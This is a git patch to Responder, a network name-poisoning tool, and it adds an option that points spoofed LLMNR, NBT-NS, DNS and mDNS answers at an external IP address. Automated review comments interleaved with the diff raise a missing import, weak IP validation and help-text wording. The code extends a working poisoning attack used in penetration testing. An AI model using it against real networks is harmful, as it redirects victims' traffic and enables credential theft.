From 04c270f6b75cd8eb833cca3b71965450d925e6ac Mon Sep 17 00:00:00 2001
From: lgandx
Date: Sun, 11 Sep 2016 20:25:10 -0300
Subject: [PATCH] Added option -e, specify an external IP address to redirect poisoned traffic to.
---
Responder.py | 7 +++++--
packets.py | 8 ++++----
poisoners/MDNS.py | 3 +--
settings.py | 7 +++++--
utils.py | 6 ++++++
5 files changed, 21 insertions(+), 10 deletions(-)
diff --git a/Responder.py b/Responder.py
index 8da125e..996fc28 100755
--- a/Responder.py
+++ b/Responder.py
@@ -25,8 +25,11 @@ banner() parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0]) parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False) -parser.add_option('-I','--interface', action="store", help="Network interface to use", dest="Interface", metavar="eth0", default=None) -parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) +parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None) +parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) + +parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None) + parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False) parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False) parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False) diff --git a/packets.py b/packets.py index 182ec1d..fc63444 100644 --- a/packets.py +++ b/packets.py 
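Review bot: The `-e` help string, `"Poison all requests with another IP address than Responder's one."`, does not say that the value must be an IPv4 address, although settings.py in this same commit passes it straight to `socket.inet_aton`. Wording such as `help="IPv4 address to put in poisoned answers instead of Responder's own address."` states the expected form and what the option changes. The new line also mixes `'-e'` with `"--externalip"`, where the neighbouring `add_option` calls use single quotes for both flags.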
@@ -19,7 +19,7 @@ import settings from base64 import b64decode, b64encode from odict import OrderedDict -from utils import HTTPCurrentDate +from utils import HTTPCurrentDate, RespondWithIPAton # Packet class handling all packet generation (see odict.py). class Packet(): @@ -57,7 +57,7 @@ class NBT_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["NbtName"] = data[12:46] - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() # DNS Answer Packet class DNS_Ans(Packet): @@ -83,7 +83,7 @@ class DNS_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) # LLMNR Answer Packet @@ -111,7 +111,7 @@ class LLMNR_Ans(Packet): ]) def calculate(self): - self.fields["IP"] = settings.Config.IP_aton + self.fields["IP"] = RespondWithIPAton() self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1] self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1] diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py index 298b527..757ee5b 100644 --- a/poisoners/MDNS.py +++ b/poisoners/MDNS.py @@ -36,7 +36,6 @@ def Poisoned_MDNS_Name(data): data = data[12:] return data[:len(data)-5] - class MDNS(BaseRequestHandler): def handle(self): MADDR = "224.0.0.251" @@ -56,7 +55,7 @@ class MDNS(BaseRequestHandler): if Parse_IPV6_Addr(data): Poisoned_Name = Poisoned_MDNS_Name(data) - Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To)) + Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton()) Buffer.calculate() soc.sendto(str(Buffer), (MADDR, MPORT)) diff --git a/settings.py b/settings.py index aba4957..f1fbde7 100644 --- a/settings.py 
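Review bot: `RespondWithIPAton()` is now called in the second poisoners/MDNS.py hunk, but neither MDNS.py hunk touches that file's imports, whereas packets.py gets an explicit `from utils import HTTPCurrentDate, RespondWithIPAton`. If MDNS.py does not already import everything from utils (its import block is not visible here), the call raises `NameError` the first time an answer is built. An explicit `from utils import RespondWithIPAton` in MDNS.py would make the dependency visible either way. `handle()` starts and ends outside the hunk.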
+++ b/settings.py @@ -152,6 +152,7 @@ class Settings: self.AutoIgnoreList = [] # CLI options + self.ExternalIP = options.ExternalIP self.LM_On_Off = options.LM_On_Off self.WPAD_On_Off = options.WPAD_On_Off self.Wredirect = options.Wredirect @@ -167,11 +168,13 @@ class Settings: self.ProxyAuth_On_Off = options.ProxyAuth_On_Off self.CommandLine = str(sys.argv) + if self.ExternalIP: + self.ExternalIPAton = socket.inet_aton(self.ExternalIP) + if self.HtmlToInject is None: self.HtmlToInject = '' - self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) - + self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) self.IP_aton = socket.inet_aton(self.Bind_To) self.Os_version = sys.platform diff --git a/utils.py b/utils.py index f2a1422..d407172 100644 --- a/utils.py +++ b/utils.py @@ -82,6 +82,12 @@ def RespondToThisName(Name): def RespondToThisHost(ClientIp, Name): return RespondToThisIP(ClientIp) and RespondToThisName(Name) +def RespondWithIPAton(): + if settings.Config.ExternalIP: + return settings.Config.ExternalIPAton + else: + return settings.Config.IP_aton + def OsInterfaceIsSupported(): if settings.Config.Interface != "Not set": return not IsOsX()
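Review bot: `socket.inet_aton(self.ExternalIP)` in the second settings.py hunk is the only check the `-e` value ever gets, and it is a loose one. A malformed string aborts start-up with a bare `socket.error` traceback, while shorthand forms with fewer than three dots are accepted and expand to an address the operator did not type, so a typo can silently direct every answer at an unintended host. `ExternalIPAton` is also assigned only when `-e` is given, which leaves the attribute undefined otherwise. I would default it to `None`, require a full dotted quad and exit with a clear message, as sketched below; the enclosing method starts and ends outside the hunk.

```python
# … unchanged: CLI option assignments, CommandLine …
self.ExternalIPAton = None
if self.ExternalIP:
    # inet_aton() also accepts shorthand such as "10.22"; insist on a.b.c.d
    if self.ExternalIP.count('.') != 3:
        sys.exit("[!] -e expects a dotted-quad IPv4 address, got %r" % self.ExternalIP)
    try:
        self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
    except socket.error:
        sys.exit("[!] -e expects a dotted-quad IPv4 address, got %r" % self.ExternalIP)
# … unchanged: HtmlToInject default, Bind_To, IP_aton …
```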
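Review bot: `RespondWithIPAton()` in the utils.py hunk tests `settings.Config.ExternalIP` but returns `settings.Config.ExternalIPAton`, so it relies on settings.py always setting the two together, and nothing in the function records that. A docstring would state the contract, for example `"""Return the packed IPv4 address for answers: the -e address when set, else the local one."""`. The `else:` after the first `return` is redundant and can be dropped.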